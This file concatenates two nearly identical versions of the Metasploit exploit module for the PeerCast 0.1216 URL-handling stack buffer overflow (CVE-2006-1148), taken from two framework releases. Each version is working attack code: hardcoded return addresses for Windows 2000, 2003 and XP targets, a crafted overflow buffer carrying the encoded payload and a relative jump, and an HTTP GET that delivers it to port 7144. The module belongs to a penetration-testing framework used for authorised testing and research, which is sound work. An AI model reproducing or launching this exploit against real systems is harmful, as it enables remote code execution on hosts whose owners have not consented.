==> metasploit-3.3.3.tbz: share/metasploit/modules/exploits/windows/http/peercast_url.rb <==
##
# $Id: peercast_url.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)',
			'Description'    => %q{
				This module exploits a stack overflow in PeerCast <= v0.1216. 
				The vulnerability is caused due to a boundary error within the
				handling of URL parameters.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					['CVE', '2006-1148'],
	  				['OSVDB', '23777'],
					['BID', '17040'],
					['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
					['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
					['Windows XP English SP0/SP1',   { 'Ret' => 0x77dbfa2c }],
					['Windows XP English SP0/SP2',   { 'Ret' => 0x77dc12b8 }],
				],
			'DisclosureDate' => 'Mar 8 2006'))
			
			register_options( [ Opt::RPORT(7144) ], self.class )
	end

	def exploit
		connect
		
		pat = rand_text_alphanumeric(1024)
		pat[768, 4] = [target.ret].pack('V')
		pat[812, 5] = [0xe9, -517].pack('CV')
		pat[300, payload.encoded.length] = payload.encoded
		
		uri = '/stream/?' + pat
		
		res = "GET #{uri} HTTP/1.0\r\n\r\n"
		
		print_status("Trying target address 0x%.8x..." % target.ret)
		sock.put(res)
		sock.close
		
		handler
		disconnect
	end

end

==> metasploit-4.5.0.tbz: share/metasploit/modules/exploits/windows/http/peercast_url.rb <==
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)',
			'Description'    => %q{
					This module exploits a stack buffer overflow in PeerCast <= v0.1216.
				The vulnerability is caused due to a boundary error within the
				handling of URL parameters.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-1148'],
					['OSVDB', '23777'],
					['BID', '17040'],
					['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
					['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
					['Windows XP English SP0/SP1',   { 'Ret' => 0x77dbfa2c }],
					['Windows XP English SP0/SP2',   { 'Ret' => 0x77dc12b8 }],
				],
			'DisclosureDate' => 'Mar 8 2006'))

		register_options( [ Opt::RPORT(7144) ], self.class )
	end

	def exploit
		connect

		pat = rand_text_alphanumeric(1024)
		pat[768, 4] = [target.ret].pack('V')
		pat[812, 5] = [0xe9, -517].pack('CV')
		pat[300, payload.encoded.length] = payload.encoded

		uri = '/stream/?' + pat

		res = "GET #{uri} HTTP/1.0\r\n\r\n"

		print_status("Trying target address 0x%.8x..." % target.ret)
		sock.put(res)
		sock.close

		handler
		disconnect
	end

end
